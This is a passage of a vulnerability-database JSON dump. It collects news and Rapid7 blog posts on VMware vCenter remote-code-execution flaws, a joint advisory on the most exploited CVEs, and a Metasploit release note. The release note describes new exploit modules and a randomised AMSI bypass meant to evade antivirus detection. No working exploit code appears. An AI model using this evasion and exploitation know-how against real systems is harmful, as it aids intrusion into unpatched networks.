"HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-05T10:58:00", "type": "thn", "title": "ALERT: Critical RCE Bug in VMware vCenter Server Under Active Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972", "CVE-2021-21985"], "modified": "2021-06-07T05:04:26", "id": "THN:71D3B9379166BDEEAEC59EE5E145C193", "href": "https://thehackernews.com/2021/06/alert-critical-rce-bug-in-vmware.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:01", "description": "[](<https://thehackernews.com/images/-2U1OlLKowHE/YK3TqGgtBNI/AAAAAAAACoM/YQnmtOrG8sE0U4uZpTIs7KcB1_8zxwSHwCLcBGAsYHQ/s0/vmware-patch-update.jpg>)\n\nVMware has rolled out patches to address a critical security vulnerability in vCenter Server that could be leveraged by an adversary to execute arbitrary code on the server.\n\nTracked as CVE-2021-21985 (CVSS score 9.8), the issue stems from a lack of input validation in the Virtual SAN ([vSAN](<https://docs.vmware.com/en/VMware-vSphere/6.5/com.vmware.vsphere.virtualsan.doc/GUID-9504EECF-5946-49FB-86C6-8A4F977F5FC3.html>)) Health Check plug-in, which is enabled by default in the vCenter Server. \"A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server,\" VMware [said](<https://www.vmware.com/security/advisories/VMSA-2021-0010.html>) in its advisory.\n\nVMware vCenter Server is a server management utility that's used to control virtual machines, ESXi hosts, and other dependent components from a single centralized location. The flaw affects vCenter Server versions 6.5, 6.7, and 7.0 and Cloud Foundation versions 3.x and 4.x. VMware credited Ricter Z of 360 Noah Lab for reporting the vulnerability.\n\nThe patch release also rectifies an authentication issue in the vSphere Client that affects Virtual SAN Health Check, Site Recovery, vSphere Lifecycle Manager, and VMware Cloud Director Availability plug-ins (CVE-2021-21986, CVSS score: 6.5), thereby allowing an attacker to carry out actions permitted by the plug-ins without any authentication.\n\n[](<https://thehackernews.com/images/-kzpGHkhfj6Q/YK3UvKUogTI/AAAAAAAACoU/VakKsSNT1o0mW1nT7BAG4vIk6F0yREY0QCLcBGAsYHQ/s0/vmware.jpg>)\n\nWhile VMware is strongly recommending customers to apply the \"[emergency change](<https://blogs.vmware.com/vsphere/2021/05/vmsa-2021-0010.html>),\" the company has published a [workaround](<https://kb.vmware.com/s/article/83829>) to set the plug-ins as incompatible. \"Disablement of these plug-ins will result in a loss of management and monitoring capabilities provided by the plug-ins,\" the company noted.\n\n\"Organizations who have placed their vCenter Servers on networks that are directly accessible from the Internet [...] should audit their systems for compromise,\" VMware [added](<https://core.vmware.com/resource/vmsa-2021-0010-faq>). \"They should also take steps to implement more perimeter security controls (firewalls, ACLs, etc.) on the management interfaces of their infrastructure.\"\n\nCVE-2021-21985 is the second critical vulnerability that VMware has rectified in the vCenter Server. Earlier this February, it resolved a remote code execution vulnerability in a vCenter Server plug-in ([CVE-2021-21972](<https://thehackernews.com/2021/02/critical-rce-flaw-affects-vmware.html>)) that could be abused to run commands with unrestricted privileges on the underlying operating system hosting the server.\n\nThe fixes for the vCenter flaws also come after the company patched another critical remote code execution bug in VMware vRealize Business for Cloud ([CVE-2021-21984](<https://www.vmware.com/security/advisories/VMSA-2021-0007.html>), CVSS score: 9.8) due to an unauthorized endpoint that could be exploited by a malicious actor with network access to run arbitrary code on the appliance.\n\nPreviously, VMware had rolled out updates to [remediate multiple flaws](<https://thehackernews.com/2021/04/critical-auth-bypass-bug-found-in.html>) in VMware Carbon Black Cloud Workload and vRealize Operations Manager solutions.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-26T04:57:00", "type": "thn", "title": "Critical RCE Vulnerability Found in VMware vCenter Server \u2014 Patch Now!", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972", "CVE-2021-21984", "CVE-2021-21985", "CVE-2021-21986"], "modified": "2021-05-26T04:57:58", "id": "THN:4F010A66018968CA6DAA0432C00DAE10", "href": "https://thehackernews.com/2021/05/critical-rce-vulnerability-found-in.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:17", "description": "[](<https://thehackernews.com/images/-_sUoUckANJU/YQJlBsicySI/AAAAAAAADX0/BEDLvJhwqzYImk1o5ewZhnKeXxnoL0D0wCLcBGAsYHQ/s0/Security-Vulnerabilities.jpg>)\n\nIntelligence agencies in Australia, the U.K., and the U.S. issued a joint advisory on Wednesday detailing the most exploited vulnerabilities in 2020 and 2021, once again demonstrating how threat actors are able to swiftly weaponize publicly disclosed flaws to their advantage.\n\n\"Cyber actors continue to exploit publicly known\u2014and often dated\u2014software vulnerabilities against broad target sets, including public and private sector organizations worldwide,\" the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC), the United Kingdom's National Cyber Security Centre (NCSC), and the U.S. Federal Bureau of Investigation (FBI) [noted](<https://us-cert.cisa.gov/ncas/alerts/aa21-209a>).\n\n\"However, entities worldwide can mitigate the vulnerabilities listed in this report by applying the available patches to their systems and implementing a centralized patch management system.\"\n\nThe top 30 vulnerabilities span a wide range of software, including remote work, virtual private networks (VPNs), and cloud-based technologies, that cover a broad spectrum of products from Microsoft, VMware, Pulse Secure, Fortinet, Accellion, Citrix, F5 Big IP, Atlassian, and Drupal.\n\nThe most routinely exploited flaws in 2020 are as follows -\n\n * [**CVE-2019-19781**](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) (CVSS score: 9.8) - Citrix Application Delivery Controller (ADC) and Gateway directory traversal vulnerability\n * [**CVE-2019-11510**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) (CVSS score: 10.0) - Pulse Connect Secure arbitrary file reading vulnerability\n * [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) (CVSS score: 9.8) - Fortinet FortiOS path traversal vulnerability leading to system file leak\n * [**CVE-2020-5902**](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) (CVSS score: 9.8) - F5 BIG-IP remote code execution vulnerability\n * [**CVE-2020-15505**](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>) (CVSS score: 9.8) - MobileIron Core & Connector remote code execution vulnerability\n * [**CVE-2020-0688**](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) (CVSS score: 8.8) - Microsoft Exchange memory corruption vulnerability\n * [**CVE-2019-3396**](<https://nvd.nist.gov/vuln/detail/CVE-2019-3396>) (CVSS score: 9.8) - Atlassian Confluence Server remote code execution vulnerability\n * [**CVE-2017-11882**](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882>) (CVSS score: 7.8) - Microsoft Office memory corruption vulnerability\n * [**CVE-2019-11580**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11580>) (CVSS score: 9.8) - Atlassian Crowd and Crowd Data Center remote code execution vulnerability\n * [**CVE-2018-7600**](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>) (CVSS score: 9.8) - Drupal remote code execution vulnerability\n * [**CVE-2019-18935**](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>) (CVSS score: 9.8) - Telerik .NET deserialization vulnerability resulting in remote code execution\n * [**CVE-2019-0604**](<https://nvd.nist.gov/vuln/detail/CVE-2019-0604>) (CVSS score: 9.8) - Microsoft SharePoint remote code execution vulnerability\n * [**CVE-2020-0787**](<https://nvd.nist.gov/vuln/detail/CVE-2020-0787>) (CVSS score: 7.8) - Windows Background Intelligent Transfer Service (BITS) elevation of privilege vulnerability\n * [**CVE-2020-1472**](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) (CVSS score: 10.0) - Windows [Netlogon elevation of privilege](<https://thehackernews.com/2021/02/microsoft-issues-patches-for-in-wild-0.html>) vulnerability\n\nThe list of vulnerabilities that have come under active attack thus far in 2021 are listed below -\n\n * [Microsoft Exchange Server](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>): [CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>), [CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>), [CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>), and [CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>) (aka \"ProxyLogon\")\n * [Pulse Secure](<https://thehackernews.com/2021/05/new-high-severity-vulnerability.html>): [CVE-2021-22893](<https://nvd.nist.gov/vuln/detail/CVE-2021-22893>), [CVE-2021-22894](<https://nvd.nist.gov/vuln/detail/CVE-2021-22894>), [CVE-2021-22899](<https://nvd.nist.gov/vuln/detail/CVE-2021-22899>), and [CVE-2021-22900](<https://nvd.nist.gov/vuln/detail/CVE-2021-22900>)\n * [Accellion](<https://thehackernews.com/2021/03/extortion-gang-breaches-cybersecurity.html>): [CVE-2021-27101](<https://nvd.nist.gov/vuln/detail/CVE-2021-27101>), [CVE-2021-27102](<https://nvd.nist.gov/vuln/detail/CVE-2021-27102>), [CVE-2021-27103](<https://nvd.nist.gov/vuln/detail/CVE-2021-27103>), and [CVE-2021-27104](<https://nvd.nist.gov/vuln/detail/CVE-2021-27104>)\n * [VMware](<https://thehackernews.com/2021/06/alert-critical-rce-bug-in-vmware.html>): [CVE-2021-21985](<https://nvd.nist.gov/vuln/detail/CVE-2021-21985>)\n * Fortinet: [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>), [CVE-2020-12812](<https://nvd.nist.gov/vuln/detail/CVE-2020-12812>), and [CVE-2019-5591](<https://nvd.nist.gov/vuln/detail/CVE-2019-5591>)\n\nThe development also comes a week after MITRE [published](<https://cwe.mitre.org/top25/archive/2021/2021_cwe_top25.html>) a list of top 25 \"most dangerous\" software errors that could lead to serious vulnerabilities that could be exploited by an adversary to take control of an affected system, obtain sensitive information, or cause a denial-of-service condition.\n\n\"The advisory [...] puts the power in every organisation's hands to fix the most common vulnerabilities, such as unpatched VPN gateway devices,\" NCSC Director for Operations, Paul Chichester, [said](<https://www.ncsc.gov.uk/news/global-cyber-vulnerabilities-advice>), urging the need to prioritize patching to minimize the risk of being exploited by malicious actors.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-07-29T08:21:00", "type": "thn", "title": "Top 30 Critical Security Vulnerabilities Most Exploited by Hackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-13379", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2019-5591", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-12812", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-5902", "CVE-2021-21985", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-08-04T09:03:14", "id": "THN:B95DC27A89565323F0F8E6350D24D801", "href": "https://thehackernews.com/2021/07/top-30-critical-security.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2021-06-05T16:53:27", "description": "\n\nOn Tuesday, May 25, 2021, VMware published [security advisory VMSA-2021-0010](<https://www.vmware.com/security/advisories/VMSA-2021-0010.html>), which includes details on CVE-2021-21985, a critical remote code execution vulnerability in the vSphere Client (HTML5) component of vCenter Server (6.5, 6.7, and 7.0) and VMware Cloud Foundation (3.x and 4.x). The vulnerability arises from lack of input validation in the Virtual SAN Health Check plug-in, which is enabled by default in vCenter Server. Successful exploitation requires network access to port 443 and allows attackers to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. CVE-2021-21985 carries a CVSSv3 base score of 9.8.\n\nWhile there are no reports of exploitation in the wild as of May 26, 2021, defenders may remember that CVE-2021-21972, another critical vCenter Server vulnerability from earlier this year, saw widespread exploitation within a few days of disclosure. It is likely that this latest severe flaw will follow suit, and we strongly recommend patching on an emergency basis, particularly given the increased prevalence of ransomware (whose operators often already have access to corporate networks via phished, leaked, reused, or otherwise stolen credentials). **Edit June 5, 2021:** Exploitation is now occurring in the wild. See AttackerKB for [full technical analysis](<https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985?referrer=blog#rapid7-analysis>).\n\nRapid7 Labs identified roughly 6,000 instances of vCenter Server exposed to the public internet as of May 26, 2021:\n\n\n\n## Recommendations\n\nVMware has a number of resources available for vCenter Server customers looking to understand and address CVE-2021-21985 and other vulnerabilities in this week\u2019s advisory, including a [blog post](<https://blogs.vmware.com/vsphere/2021/05/vmsa-2021-0010.html>) and a [supplemental FAQ](<https://core.vmware.com/resource/vmsa-2021-0010-faq>).\n\nOrganizations should update to an unaffected version of vCenter Server immediately, without waiting for their regular patch cycles. Those with emergency patch or incident response procedures should consider invoking them, particularly if their implementations of vCenter Server are (or were recently) exposed to the public internet. If you are unable to patch immediately, VMware has instructions on disabling the Virtual SAN Health Check plugin [here](<https://kb.vmware.com/s/article/83829>). Note that while disabling the plugin may mitigate exploitability, it does not remove the vulnerability.\n\nNetwork administrators should ensure that vCenter Server is not exposed to the internet.\n\nFor [further technical information of CVE-2021-21985](<https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985?referrer=blog#rapid7-analysis>), as well as community assessments of exploitability and attacker value, see AttackerKB. We'll update this blog post with more information as it becomes available.\n\n**Update June 5, 2021:** Multiple community sources have confirmed CVE-2021-21985 is [being exploited in the wild](<https://twitter.com/GossiTheDog/status/1400868390726733831>).", "cvss3": {}, "published": "2021-05-26T18:57:20", "type": "rapid7blog", "title": "CVE-2021-21985: What you need to know about the latest critical vCenter Server vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-21972", "CVE-2021-21985"], "modified": "2021-05-26T18:57:20", "id": "RAPID7BLOG:7103223D85FA1742C265703CC8D3EE7C", "href": "https://blog.rapid7.com/2021/05/26/cve-2021-21985-vcenter-server-what-you-need-to-know/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:56:11", "description": "## Eternal Blue improvements\n\n\n\nPrior to this release Metasploit offered two separate exploit modules for targeting MS17-010, dubbed Eternal Blue. The Ruby module previously only supported Windows 7, and a separate `ms17_010_eternalblue_win8` Python module would target Windows 8 and above.\n\nNow Metasploit provides a single Ruby exploit module `exploits/windows/smb/ms17_010_eternalblue.rb` which has the capability to target Windows 7, Windows 8.1, Windows 2012 R2, and Windows 10. This change removes the need for users to have Python and impacket installed on their host machine, and the automatic targeting functionality will now also make this module easier to run and exploit targets.\n\n## AmSi 0BfuSc@t!on\n\nThe Anti-Malware Scan Interface integrated into Windows poses a lot of challenges for offensive security testing. While bypasses exist and one such [technique is integrated](<https://github.com/rapid7/rex-powershell/blob/335b0eb2e32625d12fd58a1b1a569b0068ddb435/lib/rex/powershell/psh_methods.rb#L93>) directly into Metasploit, the stub itself is identified as malicious. A chicken and egg problem exists due to the stub being incapable of being executed to bypass AMSI and permit the payload from executing. To address this, Metasploit now randomizes the AMSI bypass stub itself. The randomization both obfuscates literal string values that are known qualifiers for AMSI such as `amsiInitFailed` as well as shuffles the placement of powershell expressions. With these improvements in place, Powershell payloads are now much more likely to be successfully executed. While the bypass stub is now prepended by default for all exploit modules, it can be explicitly disabled by setting `Powershell::prepend_protections_bypass` to false.\n\n## VMware vCenter Server RCE\n\nOur very own Will Vu has added a new exploit module targeting VMware vCenter Server CVE-2021-21985. This module exploits Java unsafe reflection and SSRF in the VMware vCenter Server Virtual SAN Health Check plugin's ProxygenController class to execute code as the vsphere-ui user. See the vendor advisory for affected and patched versions. This module has been tested against VMware vCenter Server 6.7 Update 3m (Linux appliance). For testing in your own lab environment, full details are in the [module documentation](<https://github.com/rapid7/metasploit-framework/blob/843a7242f4e9a5a868ff26d09428763b643933cc/documentation/modules/exploit/linux/http/vmware_vcenter_vsan_health_rce.md>).\n\n## New module content (4)\n\n * [VMware vCenter Server Virtual SAN Health Check Plugin RCE](<https://github.com/rapid7/metasploit-framework/pull/15383>) by wvu and Ricter Z, which exploits [CVE-2021-21985](<https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985?referrer=blog>) \\- A new exploit module for VMware vCenter Server CVE-2021-21985 which exploits Java unsafe reflection and SSRF in the VMware vCenter Server Virtual SAN Health Check plugin's ProxygenController class to execute code as the vsphere-ui user.\n * [Polkit D-Bus Authentication Bypass](<https://github.com/rapid7/metasploit-framework/pull/15368>) by Kevin Backhouse, Spencer McIntyre, and jheysel-r7, which exploits [CVE-2021-3560](<https://attackerkb.com/topics/Jcs7hHRUxg/cve-2021-3560?referrer=blog>) \\- A new module has been added which exploits CVE-2021-3560, an authentication bypass and local privilege elevation vulnerability in polkit, a toolkit for defining and handling authorizations which is installed by default on many Linux systems. Successful exploitation results in the creation of a new user with `root` permissions, which can then be used to gain a shell as `root`. Note that exploitation requires that users have a non-interactive session on some systems so users may need to gain a SSH session first before exploiting this vulnerability.\n * [ForgeRock / OpenAM Jato Java Deserialization](<https://github.com/rapid7/metasploit-framework/pull/15386>) by Michael Stepankin, Spencer McIntyre, bwatters-r7, and jheysel-r7, which exploits [CVE-2021-35464](<https://attackerkb.com/topics/KnAX5kffui/pre-auth-rce-in-forgerock-access-manager-cve-2021-35464?referrer=blog>) \\- A new module has been added which exploits CVE-2021-35464, a pre-authentication Java deserialization vulnerability \nin OpenAM and ForgeRock AM. Succcessful exploitation allows for remote code execution as the user running the OpenAM service.\n * [Windows Process Memory Dump](<https://github.com/rapid7/metasploit-framework/pull/15154>) by smashery - This adds a new post module that dumps the memory of any process on the target. This module is able to perform a full or a standard dump. It also downloads the file into the local loot database and delete the temporary file on the target.\n\n## Enhancements and features\n\n * [#15217](<https://github.com/rapid7/metasploit-framework/pull/15217>) from [agalway-r7](<https://github.com/agalway-r7>) \\- Removes the Python module `ms17_010_eternalblue_win8.py` and consolidates the functionality into `exploits/windows/smb/ms17_010_eternalblue.rb` \\- which as a result can now target Windows 7, Windows 8.1, Windows 2012 R2, and Windows 10. This change now removes the need to have Python installed on the host machine, and the automatic targeting functionality will now make this module easier to run.\n * [#15254](<https://github.com/rapid7/metasploit-framework/pull/15254>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This updates the AMSI bypass used by modules executing Powershell code to be randomized making it more difficult to be detected using static signatures.\n\n## Bugs fixed\n\n * [#15362](<https://github.com/rapid7/metasploit-framework/pull/15362>) from [bwatters-r7](<https://github.com/bwatters-r7>) \\- Fixes a regression issue with `post/multi/manage/shell_to_meterpreter`, and other interactions with command shell based sessions\n * [#15420](<https://github.com/rapid7/metasploit-framework/pull/15420>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Fixes an regression issue were `auxiliary/scanner/ssh/eaton_xpert_backdoor` failed to load correctly\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.0.52...6.0.53](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-07-08T16%3A19%3A37%2B01%3A00..2021-07-15T10%3A18%3A50%2B01%3A00%22>)\n * [Full diff 6.0.52...6.0.53](<https://github.com/rapid7/metasploit-framework/compare/6.0.52...6.0.53>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-16T19:47:06", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21985", "CVE-2021-35464", "CVE-2021-3560"], "modified": "2021-07-16T19:47:06", "id": "RAPID7BLOG:8495B2B62A16EF7A1217077330A344B3", "href": "https://blog.rapid7.com/2021/07/16/metasploit-wrap-up-121/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-04T19:05:10", "description": "\n\n_See the Updates section at the end of this post for new information as it comes to light, including reports of exploitation._\n\n## Description\n\nOn Tuesday, September 21, 2021, VMware published [security advisory VMSA-2021-0020](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>), which includes details on CVE-2021-22005, a critical file upload vulnerability (CVSSv3 9.8) in vCenter Server that allows remote code execution (RCE) on the appliance. Successful exploitation of this vulnerability is achieved simply by uploading a specially crafted file via port 443 \u201cregardless of the configuration settings of vCenter Server.\u201d\n\nVMware has published an [FAQ](<https://core.vmware.com/vmsa-2021-0020-questions-answers-faq#section1>) outlining the details of this vulnerability and makes it clear that this should be patched \u201cimmediately.\u201d A workaround is also being provided by VMware \u2014 however, its use is not being recommended and should only be used as a temporary solution.\n\nYou can find Rapid7's vulnerability analysis on [AttackerKB](<https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005/rapid7-analysis?referrer=blog>) which contains a root cause analysis and full RCE information.\n\n## Affected products\n\n * vCenter Server versions 6.7 and 7.0\n * Cloud Foundation (vCenter Server) 3.x, 4.x\n\n## Guidance\n\nWe echo VMware\u2019s advice that impacted servers should be patched right away. While there are currently no reports of exploitation, we expect this to quickly change within days \u2014 just as previous critical vCenter vulnerabilities did ([CVE-2021-21985](<https://www.rapid7.com/blog/post/2021/05/26/cve-2021-21985-vcenter-server-what-you-need-to-know/>), [CVE-2021-21972](<https://www.rapid7.com/blog/post/2021/02/24/vmware-vcenter-server-cve-2021-21972-remote-code-execution-vulnerability-what-you-need-to-know/>)). Additionally, Rapid7 recommends that, as a general practice, network access to critical organizational infrastructure only be allowed via VPN and never open to the public internet.\n\nWe will update this post as more information becomes available, such as information on exploitation.\n\n## Rapid7 customers\n\nA vulnerability check for CVE-2021-22005 is under development and will be available to InsightVM and Nexpose customers in an upcoming content release pending the QA process.\n\nIn the meantime, InsightVM customers can use [Query Builder](<https://docs.rapid7.com/insightvm/query-builder/>) to find assets that have vCenter Server installed by creating the following query: `software.description` `contains` `vCenter Server`. Rapid7 Nexpose customers can create a [Dynamic Asset Group](<https://docs.rapid7.com/nexpose/performing-filtered-asset-searches>) based on a filtered asset search for `Software name` `contains` `vCenter Server`.\n\n## Updates\n\n**[September 22, 2021]** \nAn InsightVM and Nexpose vulnerability check for CVE-2021-22005 is scheduled to be released on the afternoon (EST) of September 22, 2021.\n\nRapid7 Labs estimates there are over 2,700 vulnerable vCenter servers exposed to the public internet. This represents only a fraction of vulnerable servers, however, as attackers with existing network ingress will be tempted to utilize that access to take advantage of this vulnerability. \n\n**[September 23, 2021]** \nCVE-2021-22005 authenticated checks for InsightVM and Nexpose are available in content update 3594982882, released on September 23, 2021.\n\n**[September 24, 2021]** \nCVE-2021-22005 is now being [exploited](<https://twitter.com/bad_packets/status/1441465508348317702>) in the wild.\n\n**[September 29, 2021]** \nUpdated description to include a link to the Rapid7 analysis on [AttackerKB](<https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005/rapid7-analysis?referrer=blog>)\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-21T19:55:35", "type": "rapid7blog", "title": "Critical vCenter Server File Upload Vulnerability (CVE-2021-22005)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972", "CVE-2021-21985", "CVE-2021-22005"], "modified": "2021-09-21T19:55:35", "id": "RAPID7BLOG:076DBD838FD2726D9F20BCEAFC2D960D", "href": "https://blog.rapid7.com/2021/09/21/critical-vcenter-server-file-upload-vulnerability-cve-2021-22005/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2022-08-19T11:06:39", "description": "The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server.\n\n \n**Recent assessments:** \n \n**wvu-r7** at May 28, 2021 10:35pm UTC reported:\n\nDocked exploitability a point because a valid bean and method must be known. See the [Rapid7 analysis](<https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985#rapid7-analysis>) for more context.\n\n**ETA:** Cat\u2019s out of the bag. [JNDI injection 